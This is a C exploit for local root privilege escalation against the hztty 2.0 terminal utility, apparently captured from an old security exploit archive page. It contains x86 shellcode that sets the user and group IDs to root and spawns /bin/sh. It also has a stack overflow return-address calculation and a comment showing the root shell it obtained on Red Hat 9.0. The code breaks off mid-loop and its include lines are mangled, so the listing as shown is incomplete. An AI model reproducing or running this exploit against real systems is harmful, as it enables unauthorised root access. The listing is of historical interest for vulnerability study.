hztty 2.0 Local root exploit (Tested on Red Hat 9.0)

    
 
/*  0x333hztty => hztty 2.0 local root exploit
                              *
                              *
                              *      more info : Debian Security Advisory DSA 385-1
                              *
                              *      *note* I adjusted some part of hztty's code since
                              *      there were some errors. hope this will not influence
                              *      exploitation :> tested against Red Hat 9.0 :
                              *
                              * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
                              * [c0wboy@0x333 c0wboy]$ ./k
                              *
                              *  ---  local root exploit for hztty 2.0  ---
                              *  ---  coded by c0wboy ~ 0x33  ---
                              * 
                              * sh-2.05b# [./hztty started]  [using /dev/ttyp6]
                              * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
                              * sh-2.05b#
                              *
                              *  coded by c0wboy 
                              *
                              *  (c) 0x333 Outsiders Security Labs
                              *
                              */

                              #include 
                              #include 

                              #define BIN    "./hztty"
                              #define SIZE   272


                              unsigned char shellcode[] =
                              "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
                              "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                              "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
                              "\xd2\xb0\x0b\xcd\x80" ;

                              int main()
                              {
                              int i;
                              char out[SIZE];
                              char *own[] = { shellcode, 0x0 };

                              int *hztty = (int *)(out);
                              int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);

                              for (i=0 ; i
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits